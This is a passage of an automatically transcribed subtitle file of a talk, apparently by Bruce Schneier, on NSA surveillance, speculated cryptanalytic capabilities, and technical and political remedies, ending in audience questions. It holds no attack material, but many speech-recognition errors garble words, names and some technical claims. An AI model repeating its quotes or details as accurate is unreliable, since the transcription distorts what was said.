SSL is removed. 393 00:26:22,000 --> 00:26:25,000 Right encryption works. 394 00:26:25,000 --> 00:26:28,000 And in some ways that's surprising. 395 00:26:28,000 --> 00:26:30,000 But it's true. 396 00:26:30,000 --> 00:26:35,000 Unfortunately, you know, the Snowden said this in the sentence right after you were the one I just read. 397 00:26:35,000 --> 00:26:39,000 He said, unfortunately, endpoint security is so terrifically weak. 398 00:26:39,000 --> 00:26:42,000 The NSA can frequently find ways around us. 399 00:26:42,000 --> 00:26:47,000 This isn't news to us either. 400 00:26:47,000 --> 00:26:48,000 Right? 401 00:26:48,000 --> 00:26:50,000 Either way, the break cryptos are getting around it. 402 00:26:50,000 --> 00:26:54,000 We do know there is some piece of crypto analysis the NSA has. 403 00:26:54,000 --> 00:26:57,000 It's some secret thing. 404 00:26:57,000 --> 00:27:00,000 There's the basic anecdotal evidence. 405 00:27:00,000 --> 00:27:01,000 Right? 406 00:27:01,000 --> 00:27:03,000 NSA makes this huge investment in mathematics. 407 00:27:03,000 --> 00:27:06,000 That's its unparalleled anywhere else in the world. 408 00:27:06,000 --> 00:27:09,000 They hire about the top 10% of math decisions every year. 409 00:27:09,000 --> 00:27:12,000 How do US universities? 410 00:27:12,000 --> 00:27:15,000 And more interestingly, there's a sentence. 411 00:27:15,000 --> 00:27:18,000 The black budget, the intelligence budget, was leaked. 412 00:27:18,000 --> 00:27:20,000 It was Snowden document. 413 00:27:20,000 --> 00:27:21,000 I think in August. 414 00:27:21,000 --> 00:27:29,000 It was a few pages of the budget and an entire introduction by James Clapper, the director of 415 00:27:29,000 --> 00:27:30,000 National Intelligence. 416 00:27:30,000 --> 00:27:33,000 And this is a sentence in that document in his introduction. 417 00:27:33,000 --> 00:27:38,000 It's kind of out of context, but it's really worth listening to for the exact words. 418 00:27:38,000 --> 00:27:43,000 He's saying, we are investing in groundbreaking, cryptanalytic capabilities to defeat 419 00:27:43,000 --> 00:27:48,000 adversarial cryptography and exploit internet traffic. 420 00:27:48,000 --> 00:27:54,000 Now, that doesn't sound like we've hired a bunch of really smart mathematicians and 421 00:27:54,000 --> 00:27:58,000 putting them in a room and giving them a lot of computers to get lucky. 422 00:27:58,000 --> 00:28:03,000 That sounds a lot more like we have a piece of, we have something. 423 00:28:03,000 --> 00:28:10,000 That's the edge of usability and we're building the massive computer or doing the 424 00:28:10,000 --> 00:28:13,000 massive pre-computation or designing the massive hardware. 425 00:28:13,000 --> 00:28:17,000 We're doing the engineering thing to make it work. 426 00:28:17,000 --> 00:28:20,000 That's how I read that. 427 00:28:20,000 --> 00:28:24,000 That they have something but there's an engineering issue. 428 00:28:24,000 --> 00:28:27,000 I had three guesses of what it is. 429 00:28:27,000 --> 00:28:32,000 I was given a fourth a couple of days ago and so I'll give them all. 430 00:28:32,000 --> 00:28:34,000 No real order. 431 00:28:34,000 --> 00:28:37,000 The first one is elliptic curves. 432 00:28:37,000 --> 00:28:39,000 There's a lot of math that elliptic curves. 433 00:28:39,000 --> 00:28:43,000 It's easy to imagine that there is a lot of math we don't know about elliptic curves. 434 00:28:43,000 --> 00:28:48,000 You need some general advance or some advance in certain classes of elliptic curves. 435 00:28:48,000 --> 00:28:52,000 If you can force curves into that class, you can have a leg up on breaking them. 436 00:28:52,000 --> 00:28:57,000 We do know that the NSA has affected curve selection. 437 00:28:57,000 --> 00:29:01,000 That's a decent guess. 438 00:29:01,000 --> 00:29:05,000 Second guess is general, some kind of general factoring technique. 439 00:29:05,000 --> 00:29:08,000 You think about factoring in the academic world. 440 00:29:08,000 --> 00:29:09,000 It gets better every year. 441 00:29:09,000 --> 00:29:12,000 If you're going to have a 10 year or 100 there. 442 00:29:12,000 --> 00:29:16,000 You can have factoring is improved over the over the years over the decades. 443 00:29:16,000 --> 00:29:19,000 You give the NSA five to 10 years advantage. 444 00:29:19,000 --> 00:29:21,000 Have you want to characterize it? 445 00:29:21,000 --> 00:29:26,000 You're going to think of where they are. 446 00:29:26,000 --> 00:29:30,000 The third guess is RC4. 447 00:29:30,000 --> 00:29:34,000 RC4 commonly used on the internet. 448 00:29:34,000 --> 00:29:35,000 Still secure. 449 00:29:35,000 --> 00:29:45,000 You can imagine that there are five years of grip down on the advanced. 450 00:29:45,000 --> 00:29:49,000 Someone could figure it out. 451 00:29:49,000 --> 00:29:55,000 Last week, we talked about John Kelsey, who suggested random generators. 452 00:29:55,000 --> 00:30:00,000 A lot of random generators have really lousy entropy. 453 00:30:00,000 --> 00:30:05,000 That is a kind of a candidate for a massive pre-computation attack. 454 00:30:05,000 --> 00:30:14,000 If you know exactly in what way certain R and Gs are bad, you can use that to extraordinarily 455 00:30:14,000 --> 00:30:16,000 Pair down your boot force search. 456 00:30:16,000 --> 00:30:18,000 That's an interesting example. 457 00:30:18,000 --> 00:30:27,000 Even all of this, we know that most current cryptography frustrates the NSA at least at scale. 458 00:30:27,000 --> 00:30:28,000 Right? 459 00:30:28,000 --> 00:30:31,000 Individually, no, but at scale, yes. 460 00:30:31,000 --> 00:30:37,000 We know that the most of the way NSA breaks cryptos by getting around it. 461 00:30:37,000 --> 00:30:42,000 When Clapper says that crypto doesn't give them much trouble, that's what he's talking about. 462 00:30:42,000 --> 00:30:44,000 It's talking about getting around it. 463 00:30:44,000 --> 00:30:49,000 Bad implementations, default and weak keys, sabotaging standards, 464 00:30:49,000 --> 00:30:56,000 deliberately subverting products and services, and what the NSA calls exfiltrating keys. 465 00:30:56,000 --> 00:31:00,000 That's code for stealing. 466 00:31:00,000 --> 00:31:02,000 Going in the stealing keys. 467 00:31:02,000 --> 00:31:06,000 It's effective. 468 00:31:06,000 --> 00:31:09,000 And mostly the NSA relies on encrypted streams of data. 469 00:31:09,000 --> 00:31:10,000 Right? 470 00:31:10,000 --> 00:31:12,000 A lot of it, this stuff is not encrypted. 471 00:31:12,000 --> 00:31:17,000 Internet data, cloud data, cell phone data, other third-party data. 472 00:31:17,000 --> 00:31:18,000 Right? 473 00:31:18,000 --> 00:31:21,000 It's out there in the clear. 474 00:31:21,000 --> 00:31:25,000 As target, just learned, I guess. 475 00:31:25,000 --> 00:31:26,000 Right? 476 00:31:26,000 --> 00:31:27,000 So here's the problem. 477 00:31:27,000 --> 00:31:28,000 Right? 478 00:31:28,000 --> 00:31:33,000 We've made bulk data collection too easy. 479 00:31:33,000 --> 00:31:34,000 Right? 480 00:31:34,000 --> 00:31:38,000 It's easier for the NSA to collect everything than to target. 481 00:31:38,000 --> 00:31:41,000 Now, solutions are going to be complicated. 482 00:31:41,000 --> 00:31:42,000 Right? 483 00:31:42,000 --> 00:31:43,000 It's a complicated problem. 484 00:31:43,000 --> 00:31:45,000 There's no easy solution. 485 00:31:45,000 --> 00:31:50,000 It includes government self-correction, technical measures, legal measures, international 486 00:31:50,000 --> 00:31:54,000 cooperation, and I think a major shift in how we think about security and privacy. 487 00:31:54,000 --> 00:31:59,000 I want to run through, I think, some of the ways I think this will get fixed. 488 00:31:59,000 --> 00:32:02,000 The first one is are the self-corrections. 489 00:32:02,000 --> 00:32:05,000 Now, inside the NSA, things have changed. 490 00:32:05,000 --> 00:32:06,000 They have to have. 491 00:32:06,000 --> 00:32:07,000 Right? 492 00:32:07,000 --> 00:32:10,000 It's amazingly, it's amazing that it is to all of us. 493 00:32:10,000 --> 00:32:13,000 The NSA had no contingency plans for all this. 494 00:32:13,000 --> 00:32:15,000 You could speak to being leaked. 495 00:32:15,000 --> 00:32:16,000 Right? 496 00:32:16,000 --> 00:32:21,000 If you remember the NSA's responses to the first month, they had no clue what to say. 497 00:32:21,000 --> 00:32:25,000 It took them like seven, eight, nine weeks to get a PR from the proper security clearance. 498 00:32:25,000 --> 00:32:27,000 They could get a good message. 499 00:32:27,000 --> 00:32:28,000 I mean, now they're good. 500 00:32:28,000 --> 00:32:30,000 They have to do press releases. 501 00:32:30,000 --> 00:32:31,000 They have a blog. 502 00:32:31,000 --> 00:32:33,000 They're really good about being on message. 503 00:32:33,000 --> 00:32:35,000 But it took them a long time to get there. 504 00:32:35,000 --> 00:32:36,000 Right? 505 00:32:36,000 --> 00:32:37,000 That's over. 506 00:32:37,000 --> 00:32:38,000 Right? 507 00:32:38,000 --> 00:32:40,000 The cost benefit analysis has changed. 508 00:32:40,000 --> 00:32:46,000 The NSA is going to have to incorporate the risk of exposure in anything they do. 509 00:32:46,000 --> 00:32:47,000 Right? 510 00:32:47,000 --> 00:32:53,000 The political blowback has been kind of enormous here from our allies. 511 00:32:53,000 --> 00:32:55,000 And that's it. 512 00:32:55,000 --> 00:33:00,000 I mean, the stonondocking in said the NSA was spying on North Korea and the Taliban. 513 00:33:00,000 --> 00:33:01,000 Nobody would care. 514 00:33:01,000 --> 00:33:02,000 Right? 515 00:33:02,000 --> 00:33:04,000 The NSA spied on Belgium. 516 00:33:04,000 --> 00:33:09,000 Or worse, the DCHQ spotted in Belgium, which is like the braskus spying on Connecticut. 517 00:33:09,000 --> 00:33:10,000 Right? 518 00:33:10,000 --> 00:33:19,000 But you have to assume that the nature of secrecy is changing. 519 00:33:19,000 --> 00:33:22,000 That it used to be in intelligence. 520 00:33:22,000 --> 00:33:24,000 You'd come in out of college. 521 00:33:24,000 --> 00:33:25,000 You'd go into the club. 522 00:33:25,000 --> 00:33:27,000 You'd have a job for life. 523 00:33:27,000 --> 00:33:28,000 Right? 524 00:33:28,000 --> 00:33:31,000 You'd be part of the inner circle. 525 00:33:31,000 --> 00:33:34,000 And that's the way secrecy worked. 526 00:33:35,000 --> 00:33:42,000 You tell anybody under 30 job for life and they laugh at you. 527 00:33:42,000 --> 00:33:45,000 I mean, Chelsea Manning was one of four year tour. 528 00:33:45,000 --> 00:33:47,000 Edward Snowden was a contractor. 529 00:33:47,000 --> 00:33:52,000 They knew they had no job security. 530 00:33:52,000 --> 00:33:53,000 Right? 531 00:33:53,000 --> 00:33:54,000 So it's different. 532 00:33:54,000 --> 00:33:58,000 And I have to believe that the NSA now has to look at their programs and say, this is going to be 533 00:33:58,000 --> 00:34:01,000 in public in three to five years. 534 00:34:01,000 --> 00:34:02,000 Is it okay? 535 00:34:03,000 --> 00:34:06,000 And that changes their risk analysis. 536 00:34:06,000 --> 00:34:12,000 I think as a self-corrections side government, President Obama talked a bit about that yesterday, 537 00:34:12,000 --> 00:34:17,000 that maybe we shouldn't do things just because we can do things. 538 00:34:17,000 --> 00:34:23,000 And the collect everything metaphor, which was, you know, is General Alexander General Heiden before 539 00:34:23,000 --> 00:34:24,000 him. 540 00:34:24,000 --> 00:34:27,000 You know, that maybe that isn't the right thing to do. 541 00:34:27,000 --> 00:34:28,000 Right? 542 00:34:28,000 --> 00:34:30,000 They're limitations to intelligence. 543 00:34:30,000 --> 00:34:35,000 They're all these studies that's showing this is not effective. 544 00:34:35,000 --> 00:34:40,000 And I think this is going to change, you know, how we view intelligence. 545 00:34:40,000 --> 00:34:45,000 If the voyeurism just isn't worth it, because it costs us too great. 546 00:34:45,000 --> 00:34:47,000 There'll be their corrections inside corporations. 547 00:34:47,000 --> 00:34:53,000 But for Snowden, it cost you nothing to cooperate the NSA. 548 00:34:53,000 --> 00:34:58,000 And if you were a company, and the telcos did this since the 40th, throughout the Cold War, 549 00:34:58,000 --> 00:35:01,000 cooperating with the NSA is what you did. 550 00:35:01,000 --> 00:35:03,000 The internet companies were a little more taken aback, 551 00:35:03,000 --> 00:35:05,000 a little more fighting back. 552 00:35:05,000 --> 00:35:08,000 But still, everyone believed this would never become public. 553 00:35:08,000 --> 00:35:10,000 And you can do with impunity. 554 00:35:10,000 --> 00:35:13,000 And now corporations know that's just not true. 555 00:35:13,000 --> 00:35:18,000 There's enormous reputation of loss when it comes out to cooperated. 556 00:35:18,000 --> 00:35:25,000 And if enormous reputation of value in fighting, we see Apple and Microsoft and Yahoo and Google, they're all. 557 00:35:26,000 --> 00:35:32,000 Twitter, Facebook, to some extent, linked in, they're all fighting publicly. 558 00:35:34,000 --> 00:35:38,000 The hardware companies less, the telcos almost not at all. 559 00:35:38,000 --> 00:35:41,000 But even that's changing. 560 00:35:41,000 --> 00:35:45,000 There's a pushes against AT&T to the world what you're doing to fight back. 561 00:35:45,000 --> 00:35:52,000 And that's just going to change the calculus, because you can't rely on this cooperation anymore. 562 00:35:53,000 --> 00:35:56,000 Does that self-corrections? 563 00:35:56,000 --> 00:36:00,000 There's a lot of things technically that we have to do. 564 00:36:00,000 --> 00:36:05,000 And a lot of this relies on this notion of bulk collection. 565 00:36:05,000 --> 00:36:11,000 The NSA might have a larger budget than everyone else combined, but they are not made of magic. 566 00:36:11,000 --> 00:36:17,000 They're constrained by the laws of economics, the laws of physics, the laws of math. 567 00:36:18,000 --> 00:36:23,000 And the goal has to be to make bulk, even more expensive. 568 00:36:23,000 --> 00:36:28,000 I don't think we'll ever eliminate targeted collection. 569 00:36:28,000 --> 00:36:33,000 That NSA toolkit that we just saw at the end of last month was in 2008. 570 00:36:33,000 --> 00:36:36,000 It's a lot better now, towards a very, very good. 571 00:36:36,000 --> 00:36:41,000 The NSA wants into somebody's computer they will get in, period. 572 00:36:41,000 --> 00:36:44,000 But that's star, that's targeted. 573 00:36:45,000 --> 00:36:47,000 That's, I think that's okay. 574 00:36:47,000 --> 00:36:51,000 It's the bulk stuff that we want to deal with. 575 00:36:51,000 --> 00:36:59,000 And there's a lot of things we can do here that involve redesigning protocols, redesigning defaults. 576 00:36:59,000 --> 00:37:07,000 I mean, he talked about some of this yesterday, but the more we can encrypt the backbone, the better we'll do. 577 00:37:07,000 --> 00:37:12,000 I mean, encrypting the backbone makes quantum go away. 578 00:37:12,000 --> 00:37:15,000 Right, provides real security against bulk attacks. 579 00:37:15,000 --> 00:37:20,000 More importantly, provides cover traffic for those who really need it to stay alive. 580 00:37:20,000 --> 00:37:30,000 Right, more encryption in the cloud, more pervert forward secrecy, which is more things that raise the cost of doing it in bulk. 581 00:37:30,000 --> 00:37:35,000 If anything, we can do it redesign products and services. 582 00:37:35,000 --> 00:37:39,000 And we know, use your level application encryption is hard. 583 00:37:40,000 --> 00:37:45,000 More than 20 years less than a PGP is that one click email encryption is one click too much. 584 00:37:45,000 --> 00:37:51,000 Right, on the other hand, OTR is a really good lesson in how to do this successfully. 585 00:37:51,000 --> 00:37:53,000 Or hard drive encryption. 586 00:37:53,000 --> 00:37:57,000 I think, I think, maybe our biggest success story in encryption. 587 00:37:57,000 --> 00:38:00,000 That it is so easy and so transparent and so invisible. 588 00:38:00,000 --> 00:38:04,000 There is no reason for everybody not to encrypt their hard drives. 589 00:38:04,000 --> 00:38:07,000 You never even notice you're doing it. 590 00:38:07,000 --> 00:38:09,000 It comes default in the operating systems. 591 00:38:09,000 --> 00:38:14,000 If you don't trust those, there are various third party packages. 592 00:38:14,000 --> 00:38:16,000 More endpoint security. 593 00:38:16,000 --> 00:38:20,000 NSA documents talk about PSPs, personal security products. 594 00:38:20,000 --> 00:38:22,000 And they give them trouble. 595 00:38:22,000 --> 00:38:24,000 They don't like them. 596 00:38:24,000 --> 00:38:28,000 Right, so the more we use them, the better we are. 597 00:38:28,000 --> 00:38:31,000 Right, more open standards, more open source. 598 00:38:31,000 --> 00:38:34,000 Right, things that are hardest, harder to subvert. 599 00:38:35,000 --> 00:38:38,000 Another big thing I think we need to go back to is target dispersal. 600 00:38:38,000 --> 00:38:44,000 We were way more secure when there are 100,000 ISPs than when there were 100. 601 00:38:44,000 --> 00:38:50,000 Having these massive targets is very dangerous. 602 00:38:50,000 --> 00:38:53,000 I mean, not just technically but legally. 603 00:38:53,000 --> 00:38:56,000 Right, a single Google, a single Facebook. 604 00:38:56,000 --> 00:38:58,000 Everybody on Gmail. 605 00:38:58,000 --> 00:39:03,000 You actually don't want this. 606 00:39:03,000 --> 00:39:05,000 And the last thing is assurance. 607 00:39:05,000 --> 00:39:08,000 This is the hardest, but this is the most important. 608 00:39:08,000 --> 00:39:11,000 We really need to figure assurance out. 609 00:39:11,000 --> 00:39:16,000 We need to be able to prove, demonstrate somehow that the software we use, 610 00:39:16,000 --> 00:39:20,000 does what we want it to do and doesn't do anything else. 611 00:39:20,000 --> 00:39:25,000 That's nowhere near near term. 612 00:39:25,000 --> 00:39:29,000 Anything, any reason we are assembling modern software. 613 00:39:29,000 --> 00:39:32,000 But it's extraordinarily important. 614 00:39:33,000 --> 00:39:43,000 Right, because a lot of this surveillance relies on these hidden capabilities. 615 00:39:43,000 --> 00:39:48,000 But so largely, you might despite all this, this is a political problem. 616 00:39:48,000 --> 00:39:50,000 And it's a difficult political problem. 617 00:39:50,000 --> 00:39:56,000 And the US, we are long past the point where simple legal interventions can help. 618 00:39:57,000 --> 00:40:01,000 I'll let you know about one particular data base. 619 00:40:01,000 --> 00:40:04,000 The cell phone call record database. 620 00:40:04,000 --> 00:40:09,000 Collected at a one particular legal authority, 702. 621 00:40:09,000 --> 00:40:15,000 I think the odds are zero, that is the only way the NSA gets that data. 622 00:40:15,000 --> 00:40:19,000 And if they don't get it, the Brits get it and give it to us. 623 00:40:19,000 --> 00:40:23,000 I largely think that 702 is a crumples are. 624 00:40:23,000 --> 00:40:26,000 And then the real capabilities are behind that. 625 00:40:26,000 --> 00:40:29,000 And we know in general what the solution looks like, 626 00:40:29,000 --> 00:40:33,000 transparency, oversight, accountability. 627 00:40:33,000 --> 00:40:36,000 But how exactly that works is going to be really hard. 628 00:40:36,000 --> 00:40:41,000 And our problem is that laws, lag, technology. 629 00:40:41,000 --> 00:40:46,000 The technology is always ahead of the legal regime to restrict it. 630 00:40:46,000 --> 00:40:52,000 So the NSA is going to go into these new technologies with everything because there's nothing stopping them. 631 00:40:53,000 --> 00:40:57,000 There's a quote, General Heiden, the previous NSA director said, 632 00:40:57,000 --> 00:40:59,000 I think it's on a TV interview. 633 00:40:59,000 --> 00:41:02,000 And he's talking about his limitations. 634 00:41:02,000 --> 00:41:05,000 And he says, give me the box you will allow me to operate in. 635 00:41:05,000 --> 00:41:08,000 I'm going to play the very edges of that box. 636 00:41:08,000 --> 00:41:14,000 That makes sense until you realize that technology expands his box constantly. 637 00:41:14,000 --> 00:41:19,000 So if he's pushing the edges by the time log gets around and noticing the box is bigger, 638 00:41:19,000 --> 00:41:20,000 it's too late. 639 00:41:20,000 --> 00:41:25,000 You reduce the capabilities. 640 00:41:25,000 --> 00:41:30,000 And of course, even if we do succeed, raining in the NSA only affects the United States. 641 00:41:30,000 --> 00:41:35,000 It's not going to really affect non-US persons despite what Obama said yesterday. 642 00:41:35,000 --> 00:41:39,000 It's not going to affect the actions of other countries. 643 00:41:39,000 --> 00:41:46,000 And when I talk about this in other environments, I very often get this sort of response. 644 00:41:46,000 --> 00:41:52,000 You can't stop the NSA because if you do, then China will do it. 645 00:41:52,000 --> 00:41:55,000 And that's fundamentally an arms race argument. 646 00:41:55,000 --> 00:41:59,000 This is zero-sum game here, us versus China, whoever your enemy is. 647 00:41:59,000 --> 00:42:02,000 And if we don't do it, they will and they win. 648 00:42:02,000 --> 00:42:05,000 And that's a really bad position to be. 649 00:42:05,000 --> 00:42:08,000 And I think it's a wrong way to frame this. 650 00:42:08,000 --> 00:42:14,000 What we have to do is get the world to realize that a secure internet is in everyone's best interest. 651 00:42:14,000 --> 00:42:16,000 And it's not us versus them. 652 00:42:16,000 --> 00:42:18,000 It's security versus insecurity. 653 00:42:18,000 --> 00:42:23,000 Once you do that, you turn a zero-sum game to a positive sum game. 654 00:42:23,000 --> 00:42:25,000 You have laws that treat support it. 655 00:42:25,000 --> 00:42:27,000 You have technology support the laws. 656 00:42:27,000 --> 00:42:29,000 You set up other laws. 657 00:42:29,000 --> 00:42:32,000 Other technology deals non-compliant actors to state non-state. 658 00:42:32,000 --> 00:42:34,000 Where it doesn't make it easy. 659 00:42:34,000 --> 00:42:38,000 But it makes it like any other one of the hard international problems. 660 00:42:38,000 --> 00:42:43,000 Money laundering, nuclear-owned preparation, human trafficking, small-arms trafficking. 661 00:42:43,000 --> 00:42:45,000 Landmines. 662 00:42:45,000 --> 00:42:52,000 I mean, it's very hard to make those work internationally for all the reasons you know. 663 00:42:52,000 --> 00:42:57,000 But at least we all know vaguely the direction we're moving towards. 664 00:42:57,000 --> 00:43:01,000 We all sort of know the goal. 665 00:43:01,000 --> 00:43:06,000 And the goal is security versus surveillance. 666 00:43:06,000 --> 00:43:10,000 And if you think about that, that's the NSA's dual mission. 667 00:43:11,000 --> 00:43:13,000 It's securing our stuff, 668 00:43:13,000 --> 00:43:15,000 you're dropping on there stuff. 669 00:43:15,000 --> 00:43:20,000 We're great when our stuff was NATO and their stuff was also a pact. 670 00:43:20,000 --> 00:43:24,000 Works less well when our stuff and their stuff are the same. 671 00:43:24,000 --> 00:43:30,000 Works really badly when the administration tells you to ease drop on everybody. 672 00:43:30,000 --> 00:43:33,000 Because the terrorist could be everywhere in the striking at any time. 673 00:43:33,000 --> 00:43:36,000 Or constantly help we're scared. 674 00:43:37,000 --> 00:43:41,000 So the two missions go out of balance. 675 00:43:41,000 --> 00:43:44,000 And we need to do as we balance them. 676 00:43:44,000 --> 00:43:53,000 And even more so, rebalance them waiting security more than surveillance. 677 00:43:53,000 --> 00:44:00,000 Right? I mean, the surveillance here is robust again politically, legally, technically. 678 00:44:00,000 --> 00:44:05,000 And we need to solve this, not just to the NSA, but for everybody. 679 00:44:05,000 --> 00:44:10,000 For the other governments, cyber criminals, rogue actors. 680 00:44:10,000 --> 00:44:15,000 I think a secure internet is vital to society. 681 00:44:15,000 --> 00:44:18,000 And I think we need to move forward to get there. 682 00:44:18,000 --> 00:44:24,000 I mean near term, I actually don't think for a minute we'll win the stop doing this argument. 683 00:44:24,000 --> 00:44:27,000 We might win the tell us what you're doing argument. 684 00:44:27,000 --> 00:44:31,000 And I think that would be worth it. 685 00:44:31,000 --> 00:44:34,000 For us, we need to fight futility. 686 00:44:34,000 --> 00:44:38,000 A lot of times I talked about a political activist, especially from third world countries, 687 00:44:38,000 --> 00:44:40,000 there's a lot of futility out there. 688 00:44:40,000 --> 00:44:41,000 There's nothing I can do. 689 00:44:41,000 --> 00:44:43,000 There for I should do nothing. 690 00:44:43,000 --> 00:44:44,000 That's wrong. 691 00:44:44,000 --> 00:44:45,000 That's bad. 692 00:44:45,000 --> 00:44:48,000 Right? Everything we do makes it harder. 693 00:44:48,000 --> 00:44:50,000 Makes it better. 694 00:44:50,000 --> 00:44:53,000 And fighting the sense of utilities is really important. 695 00:44:53,000 --> 00:44:54,000 I mean, we need to do that. 696 00:44:54,000 --> 00:44:57,000 We need to fight the bulk of the nation in the internet. 697 00:44:58,000 --> 00:45:00,000 I think that's the worst blowback from the NSA surveillance. 698 00:45:00,000 --> 00:45:04,000 The idea that some countries will make their own internet somehow, 699 00:45:04,000 --> 00:45:06,000 even if that's possible. 700 00:45:06,000 --> 00:45:10,000 It's enormous value in a single global internet. 701 00:45:10,000 --> 00:45:13,000 And we need to figure out who we can trust. 702 00:45:13,000 --> 00:45:16,000 We need to figure out the new governance models. 703 00:45:16,000 --> 00:45:18,000 What organizations, right? 704 00:45:18,000 --> 00:45:20,000 Not the ITU, please. 705 00:45:20,000 --> 00:45:22,000 But something. 706 00:45:22,000 --> 00:45:26,000 And I think we eventually will win the protecting 707 00:45:26,000 --> 00:45:28,000 world in the East dropping argument. 708 00:45:28,000 --> 00:45:31,000 I mean, it might not be for another 10 years. 709 00:45:31,000 --> 00:45:34,000 But I do believe that is where we are headed. 710 00:45:34,000 --> 00:45:37,000 And then when someone says, well, if you don't do a China will, 711 00:45:37,000 --> 00:45:40,000 you can say, well, just because China builds a marginal line, 712 00:45:40,000 --> 00:45:42,000 doesn't mean we have to. 713 00:45:42,000 --> 00:45:44,000 That would be dumb. 714 00:45:44,000 --> 00:45:48,000 Because fundamentally, that's what's true. 715 00:45:48,000 --> 00:45:51,000 And really, I'm going to start end with this. 716 00:45:51,000 --> 00:45:54,000 This problem is much bigger than the NSA. 717 00:45:55,000 --> 00:45:58,000 In general, this is about data. 718 00:45:58,000 --> 00:45:59,000 It's about data sharing. 719 00:45:59,000 --> 00:46:03,000 It's about surveillance as a model of business. 720 00:46:03,000 --> 00:46:07,000 And it's about the side-led benefits of big data versus the individual 721 00:46:07,000 --> 00:46:10,000 risks of personal data. 722 00:46:10,000 --> 00:46:15,000 And what do we do with data that benefits society as a group, 723 00:46:15,000 --> 00:46:19,000 versus that same data that is personal individuals? 724 00:46:19,000 --> 00:46:23,000 Think of it as behavioral data, but behavioral data for advertising. 725 00:46:23,000 --> 00:46:26,000 Think of as medical data as education data. 726 00:46:26,000 --> 00:46:29,000 Actually, medical data, I think the easy way to explain it. 727 00:46:29,000 --> 00:46:32,000 I mean, we put all of our health records in a massive database that 728 00:46:32,000 --> 00:46:36,000 would be enormously valuable for research. 729 00:46:36,000 --> 00:46:38,000 Yet incredibly personal. 730 00:46:38,000 --> 00:46:41,000 How do we deal with that? 731 00:46:41,000 --> 00:46:46,000 How do we extract the group benefits of data while still protecting 732 00:46:46,000 --> 00:46:47,000 individuals? 733 00:46:47,000 --> 00:46:51,000 That's really what this NSA debates about. 734 00:46:52,000 --> 00:46:55,000 And that's just one of many debates. 735 00:46:55,000 --> 00:46:58,000 I think this is the fundamental issue of the information society. 736 00:46:58,000 --> 00:47:01,000 I think solving it will take decades. 737 00:47:01,000 --> 00:47:06,000 And solving it is what the historians of this era are going to write about. 738 00:47:06,000 --> 00:47:08,000 Because that's what's important. 739 00:47:08,000 --> 00:47:12,000 So thanks, and I'm happy for a few questions. 740 00:47:12,000 --> 00:47:24,000 So there's a microphone in the middle standing there. 741 00:47:24,000 --> 00:47:27,000 And that's going to be the question, Mike. 742 00:47:27,000 --> 00:47:29,000 So you would have to run over there quickly. 743 00:47:29,000 --> 00:47:30,000 Yes. 744 00:47:30,000 --> 00:47:38,000 I literally, the only one. 745 00:47:38,000 --> 00:47:40,000 Actually, you're figured really the only one. 746 00:47:40,000 --> 00:47:42,000 Figurally. 747 00:47:42,000 --> 00:47:43,000 Yeah. 748 00:47:43,000 --> 00:47:48,000 I work with a PhD physicist who's admittedly pretty paranoid guy. 749 00:47:48,000 --> 00:47:55,000 But he's utterly convinced that the NSA has a functional working classical quantum computer 750 00:47:55,000 --> 00:48:02,000 that is capable of decrypting SSL in real time at line rate on 10 seconds. 751 00:48:02,000 --> 00:48:03,000 So let's have a show of hands. 752 00:48:03,000 --> 00:48:07,000 Who thinks that physicist is paranoid and dreaming? 753 00:48:07,000 --> 00:48:08,000 So that's what I thought. 754 00:48:08,000 --> 00:48:09,000 But I want to know it. 755 00:48:09,000 --> 00:48:12,000 Okay, let's think she's right. 756 00:48:12,000 --> 00:48:13,000 Okay. 757 00:48:13,000 --> 00:48:14,000 I've all prepared on in dreaming. 758 00:48:14,000 --> 00:48:16,000 By a lot. 759 00:48:16,000 --> 00:48:19,000 We can factor like 15, I think. 760 00:48:19,000 --> 00:48:24,000 And quantum computers are nowhere near. 761 00:48:24,000 --> 00:48:27,000 I mean, yes, of course they have a program to do research. 762 00:48:27,000 --> 00:48:28,000 I mean, why wouldn't they? 763 00:48:28,000 --> 00:48:30,000 It would be embarrassing if they didn't. 764 00:48:30,000 --> 00:48:32,000 No, this is really science fiction. 765 00:48:32,000 --> 00:48:34,000 The world would be very different, otherwise. 766 00:48:34,000 --> 00:48:38,000 I don't think that's even remotely possible right now. 767 00:48:38,000 --> 00:48:40,000 It'd be cool if I was wrong, wouldn't it? 768 00:48:40,000 --> 00:48:42,000 But I just don't think so. 769 00:48:42,000 --> 00:48:45,000 But this is the problem with a lot of this stuff, right? 770 00:48:45,000 --> 00:48:50,000 On the one hand, it's really, really cool that the United States kills people of flying robots. 771 00:48:50,000 --> 00:48:53,000 On the other hand, oh my god, it'd be kill people of flying robots. 772 00:48:53,000 --> 00:48:55,000 Huh, right? 773 00:48:55,000 --> 00:48:58,000 Right, this is fun. 774 00:48:58,000 --> 00:49:03,000 Makes it really hard. 775 00:49:03,000 --> 00:49:04,000 Yes. 776 00:49:04,000 --> 00:49:05,000 Hi, Bruce. 777 00:49:05,000 --> 00:49:11,000 One of the publicly stated purposes of the Utah facility is AS256. 778 00:49:11,000 --> 00:49:15,000 You know, I've got to find that if I had the Utah facility, I wouldn't waste time on that. 779 00:49:15,000 --> 00:49:18,000 I mean, the Utah facility, I believe, is for data storage. 780 00:49:18,000 --> 00:49:21,000 It is storage data processing of all of this metadata. 781 00:49:21,000 --> 00:49:30,000 That they have these massive data mining algorithms, like some of the things I talked about for a self-inlocation data, 782 00:49:30,000 --> 00:49:37,000 and they just need all the data to be in RAM somewhere, on disk to mean they need to be close. 783 00:49:37,000 --> 00:49:38,000 It can't be on tape. 784 00:49:38,000 --> 00:49:46,000 So they need facilities that can move this data around in that processing and do parallel work that really efficiently. 785 00:49:46,000 --> 00:49:48,000 That's what I think that is about. 786 00:49:48,000 --> 00:49:54,000 I mean, AS256 is a lot more data than would be there, and I think it would be a waste of their time. 787 00:49:54,000 --> 00:49:58,000 I mean, the real hard thing here is analysis, not getting more data. 788 00:49:58,000 --> 00:50:04,000 Breaking the message between A to B that was encrypted, they know the message there, they know how long it is. 789 00:50:04,000 --> 00:50:05,000 That's good enough. 790 00:50:05,000 --> 00:50:07,000 Let's figure out what we're really going on. 791 00:50:07,000 --> 00:50:09,000 So they're not just mining, but corn. 792 00:50:09,000 --> 00:50:10,000 Sorry? 793 00:50:10,000 --> 00:50:12,000 They're not. 794 00:50:12,000 --> 00:50:14,000 I didn't hear that. 795 00:50:14,000 --> 00:50:16,000 So they're not just mining Bitcoin. 796 00:50:16,000 --> 00:50:18,000 They didn't hear it. 797 00:50:18,000 --> 00:50:21,000 They wanted to mine bitcoins that use your computer. 798 00:50:29,000 --> 00:50:32,000 Can you say anything about your meeting with Congress earlier in the week? 799 00:50:32,000 --> 